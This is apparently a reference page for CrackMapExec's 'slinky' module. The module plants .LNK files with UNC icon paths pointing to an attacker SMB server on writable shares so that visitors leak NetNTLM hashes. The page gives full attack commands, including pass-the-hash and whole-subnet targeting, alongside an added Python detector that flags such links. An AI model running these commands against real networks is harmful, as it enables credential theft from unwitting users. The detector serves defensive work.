CrackMapExec Slinky (smb)
This page contains detailed information about how to use the slinky CME module with the smb protocol. For a list of all CrackMapExec modules, visit the CrackMapExec Module Library.
Description
This module creates a Windows shortcut (.LNK file) with a specially crafted icon attribute on every remote writable share. The icon attribute points to an arbitrary UNC path, ideally the attacker's machine. Afterwards, anyone who opens the shared folder containing the .LNK file will automatically try to authenticate against the specified SERVER (to load the icon) and send their NetNTLM hash. The attacker can then capture the NetNTLM hash (e.g. with Responder or the auxiliary/server/capture/smb Metasploit module) and crack it.
The slinky module is OPSEC unsafe, which means that it touches the disk (a .LNK file is written to each writable share) and can therefore trigger an alarm.
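As an added example (not part of this page or of CrackMapExec), here is a defender-side check for the artifact this module leaves behind: it parses the StringData section of a shell link as laid out in MS-SHLLINK and flags .LNK files whose IconLocation names a UNC host rather than a local file. The sample link is constructed inline for testing; the host 10.0.6.11 simply mirrors the SERVER value used in the page's examples.

```python
import struct

# MS-SHLLINK 2.1.1 LinkFlags (dword at header offset 0x14)
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 1, 2, 4, 8
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 16, 32, 64, 128
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HEADER_SIZE = 0x4C

def parse_lnk_strings(data: bytes) -> dict:
    """Return the StringData fields (MS-SHLLINK 2.4) of a shell link."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data)[0] != HEADER_SIZE:
        raise ValueError("bad HeaderSize: not a shell link")
    if data[4:20] != LNK_CLSID:
        raise ValueError("bad LinkCLSID: not a shell link")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    off = HEADER_SIZE
    if flags & HAS_ID_LIST:          # IDListSize (2 bytes) followed by the IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:        # LinkInfoSize is the first dword of LinkInfo
        off += struct.unpack_from("<I", data, off)[0]
    fields = (("name", HAS_NAME), ("relative_path", HAS_REL_PATH),
              ("working_dir", HAS_WORK_DIR), ("arguments", HAS_ARGS),
              ("icon_location", HAS_ICON))
    out = {}
    for key, bit in fields:          # each item: CountCharacters + characters
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off:off + count * width]
        out[key] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        off += count * width
    return out

def remote_icon_host(data: bytes):
    """Host named by a UNC IconLocation (\\\\host\\share\\...), else None."""
    icon = parse_lnk_strings(data).get("icon_location", "")
    if icon.startswith("\\\\") and icon[2:3] not in ("?", "."):  # \\?\ and \\.\ are local
        return icon[2:].split("\\", 1)[0]
    return None

def constructed_sample(icon_location: str) -> bytes:
    """Constructed test fixture: minimal Unicode .LNK carrying only an IconLocation."""
    flags = HAS_ICON | IS_UNICODE
    hdr = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                      0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)  # ShowCommand=SW_SHOWNORMAL, rest zero
    return hdr + struct.pack("<H", len(icon_location)) + icon_location.encode("utf-16-le")
```

Run remote_icon_host over every *.lnk collected from a share; any non-None result is a link that will make Explorer authenticate to a remote host just to draw the icon.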
Supported Protocols
- smb
Module Options
Here is a complete list of slinky module options:
# cme smb -M slinky --options
[*] slinky module options:
SERVER   IP of the SMB server that the LNK icon will point to
NAME     LNK file name
CLEANUP  Cleanup: remove the .LNK files dropped by a previous run (choices: True or False)
The SERVER and NAME options are required! Make sure to set them when using this module.
Module Usage
This is how to use the slinky module while using the smb protocol:
Syntax:
# cme smb <TARGET[s]> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M slinky -o SERVER=<host> -o NAME=<name>
Local admin:
# cme smb 10.0.5.1 -u Administrator -p P@ss123 -d . -M slinky -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1 -u Administrator -p P@ss123 --local-auth -M slinky -o SERVER=10.0.6.11 -o NAME=test
Domain user:
# cme smb 10.0.5.1 -u bkpadmin -p P@ss123 -d target.corp -M slinky -o SERVER=10.0.6.11 -o NAME=test
CrackMapExec also supports passing the hash, so you can specify an NTLM hash instead of a password:
# cme smb 10.0.5.1 -u Administrator -H 432b022dc22aa5afe884e986b8383ff2 -d . -M slinky -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1 -u bkpadmin -H 432b022dc22aa5afe884e986b8383ff2 -d target.corp -M slinky -o SERVER=10.0.6.11 -o NAME=test
The slinky module can also be used against multiple hosts. Here's how to run it against multiple hosts:
# cme smb target_list.txt -u Administrator -p P@ss123 -d . -M slinky -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.0/24 -u Administrator -p P@ss123 -d . -M slinky -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1-100 -u Administrator -p P@ss123 -d . -M slinky -o SERVER=10.0.6.11 -o NAME=test
References
- https://medium.com/@markmotig/capturing-hashes-with-hidden-folders-lnk-files-and-smbserver-by-markmo-a4ab87b7aa15
- https://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/server/capture/smb
Version
This page has been created based on CrackMapExec version 5.1.7dev.